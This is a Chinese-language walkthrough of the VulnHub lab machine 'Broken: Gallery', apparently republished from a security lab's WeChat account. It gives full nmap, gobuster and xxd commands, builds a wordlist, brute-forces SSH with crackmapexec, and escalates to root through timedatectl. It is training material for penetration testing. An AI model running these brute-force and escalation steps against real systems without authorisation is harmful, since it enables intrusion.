【VulnHub系列】BrokenGallery
【VulnHub系列】BrokenGallery
Ms08067安全实验室
发布于 2023-08-18 13:27:46
发布于 2023-08-18 13:27:46
出品|MS08067实验室
本文作者:大方子
#01
实验信息
Broken:192.168.10.111
Kali:192.168.10.106
#02
实验过程
sudo arp-scan --interface eth0 192.168.10.1/24
然后对靶机进行端口探测
nmap -sT -p- --min-rate 1000 192.168.10.111 -oA ./Broken_result
再对端口进行详细扫描和漏洞扫描
cat Broken_result.nmap | grep "open" | awk -F '/' '{print $1}' | paste -sd ','
sudo nmap -sT -sC -sV -p 22,80 192.168.10.111 -oA ./detail详细扫描发现80端口有几个文件
后台挂着gobuster来跑目录
sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -u
http://192.168.10.111/ -x txt,rar,zip,tar,sql,php打开80端口,发现文件都wget保存到本地,查看网页源码以及文件来收集信息
xdg-open img_forest.jpg查看REAMD.md的文件类型,是txt类型
用cat发现都是十六进制的字节码
-r选项用于将十六进制格式转换回二进制格式
-p表示输出纯粹的十六进制编码,而不包括其他信息
-s选项用于跳过文件的前N个字节
通过strings来读二进制文件,通过head来读取前几行内容来确定文件类型
-r选项用于将十六进制格式转换回二进制格式
-p表示输出纯粹的十六进制编码,而不包括其他信息
-s选项用于跳过文件的前N个字节
xxd -r -ps README.md > README.binstrings README.bin | head -n 10可以看到JFIF头,说明这个文件是图片文件,更改为Jpg后缀并打开
是一段文字信息
再用exiftool来看看其他图片,没有发现有隐藏的信息
同时目录爆破也并没有什么有用信息
所以只能把注意力放到22端口上
我们根据从图片获取的信息制作一个简易的字典文件尝试爆破SSH
通过crackmapexec进行SSH爆破
#--continue-on-success:表示成功获得凭据后继续爆破
#跟john相比,john更偏向快速,creackmapexec支持的协议和功能比较多
sudo crackmapexec ssh 192.168.10.111 -u creds -p creds --continue-on-success
获得账号密码
broken:broken
登陆broken,发现其可以通过timedatectl来提权
通过gtfobins:https://gtfobins.github.io/ 来查看对应的提权方法
成功获得root权限
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-07-06,如有侵权请联系 cloudcommunity@tencent.com 删除
本文分享自 Ms08067安全实验室 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!
评论
登录后参与评论
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。